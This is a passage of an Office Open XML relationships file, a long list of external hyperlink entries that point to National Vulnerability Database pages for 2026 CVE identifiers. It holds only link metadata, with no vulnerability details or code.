Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69420" TargetMode="External" Id="rId2149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId2150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69424" TargetMode="External" Id="rId2151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69426" TargetMode="External" Id="rId2152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69432" TargetMode="External" Id="rId2153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69433" TargetMode="External" Id="rId2154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69436" TargetMode="External" Id="rId2155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69444" TargetMode="External" Id="rId2156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69445" TargetMode="External" Id="rId2157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69447" TargetMode="External" Id="rId2158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69450" TargetMode="External" Id="rId2159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69455" TargetMode="External" Id="rId2160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69456" TargetMode="External" Id="rId2161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69459" TargetMode="External" Id="rId2162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69467" TargetMode="External" Id="rId2163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId2164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId2165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69478" TargetMode="External" Id="rId2166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69480" TargetMode="External" Id="rId2167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId2168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69508" TargetMode="External" Id="rId2169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69509" TargetMode="External" Id="rId2170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69513" TargetMode="External" Id="rId2171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69528" TargetMode="External" Id="rId2172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId2173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69534" TargetMode="External" Id="rId2174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69535" TargetMode="External" Id="rId2175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69538" TargetMode="External" Id="rId2176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69541" TargetMode="External" Id="rId2177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69542" TargetMode="External" Id="rId2178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69544" TargetMode="External" Id="rId2179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69561" TargetMode="External" Id="rId2180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId2181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69576" TargetMode="External" Id="rId2182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId2183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69582" TargetMode="External" Id="rId2184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId2185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId2186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69585" TargetMode="External" Id="rId2187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId2188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69592" TargetMode="External" Id="rId2189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId2190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69594" TargetMode="External" Id="rId2191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69604" TargetMode="External" Id="rId2192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69608" TargetMode="External" Id="rId2193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69612" TargetMode="External" Id="rId2194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69685" TargetMode="External" Id="rId2195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId2196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69691" TargetMode="External" Id="rId2197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId2198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId2199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69720" TargetMode="External" Id="rId2200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69725" TargetMode="External" Id="rId2201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69731" TargetMode="External" Id="rId2202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId2203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69758" TargetMode="External" Id="rId2204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69785" TargetMode="External" Id="rId2205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId2206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69790" TargetMode="External" Id="rId2207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69799" TargetMode="External" Id="rId2208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69801" TargetMode="External" Id="rId2209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69821" TargetMode="External" Id="rId2210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId2211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId2212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId2213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69864" TargetMode="External" Id="rId2214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId2215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId2216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId2217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId2218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70334" TargetMode="External" Id="rId2219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId2220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId2221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId2222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70574" TargetMode="External" Id="rId2223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId2224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70583" TargetMode="External" Id="rId2225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70584" TargetMode="External" Id="rId2226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId2227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId2228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId2229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71345" TargetMode="External" Id="rId2230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71382" TargetMode="External" Id="rId2231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71613" TargetMode="External" Id="rId2232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72929" TargetMode="External" Id="rId2233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId2234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72944" TargetMode="External" Id="rId2235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72946" TargetMode="External" Id="rId2236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72953" TargetMode="External" Id="rId2237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72957" TargetMode="External" Id="rId2238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72965" TargetMode="External" Id="rId2239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72967" TargetMode="External" Id="rId2240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId2241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId2242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId2243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId2244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId2245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId2246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId2247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId2248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId2249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId2250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId2251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId2252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId2253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId2254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73014" TargetMode="External" Id="rId2255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId2256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId2257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId2258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73024" TargetMode="External" Id="rId2259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId2260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73231" TargetMode="External" Id="rId2261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73234" TargetMode="External" Id="rId2262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73505" TargetMode="External" Id="rId2263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7476" TargetMode="External" Id="rId2264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7477" TargetMode="External" Id="rId2265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75631" TargetMode="External" Id="rId2266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75771" TargetMode="External" Id="rId2267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75862" TargetMode="External" Id="rId2268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75863" TargetMode="External" Id="rId2269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75992" TargetMode="External" Id="rId2270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76957" TargetMode="External" Id="rId2271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId2272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId2273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId2274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId2275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId2276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78136" TargetMode="External" Id="rId2277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId2278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId2279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78482" TargetMode="External" Id="rId2280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78484" TargetMode="External" Id="rId2281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78493" TargetMode="External" Id="rId2282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79907" TargetMode="External" Id="rId2283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79908" TargetMode="External" Id="rId2284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79909" TargetMode="External" Id="rId2285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80075" TargetMode="External" Id="rId2286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80161" TargetMode="External" Id="rId2287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80166" TargetMode="External" Id="rId2288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81353" TargetMode="External" Id="rId2289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81386" TargetMode="External" Id="rId2290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81388" TargetMode="External" Id="rId2291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81396" TargetMode="External" Id="rId2292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81397" TargetMode="External" Id="rId2293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81398" TargetMode="External" Id="rId2294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81947" TargetMode="External" Id="rId2295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81948" TargetMode="External" Id="rId2296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81949" TargetMode="External" Id="rId2297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81950" TargetMode="External" Id="rId2298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81951" TargetMode="External" Id="rId2299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81953" TargetMode="External" Id="rId2300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81954" TargetMode="External" Id="rId2301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81956" TargetMode="External" Id="rId2302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81957" TargetMode="External" Id="rId2303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81959" TargetMode="External" Id="rId2304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81960" TargetMode="External" Id="rId2305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81973" TargetMode="External" Id="rId2306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81975" TargetMode="External" Id="rId2307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81976" TargetMode="External" Id="rId2308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81979" TargetMode="External" Id="rId2309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81980" TargetMode="External" Id="rId2310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81981" TargetMode="External" Id="rId2311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81983" TargetMode="External" Id="rId2312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81985" 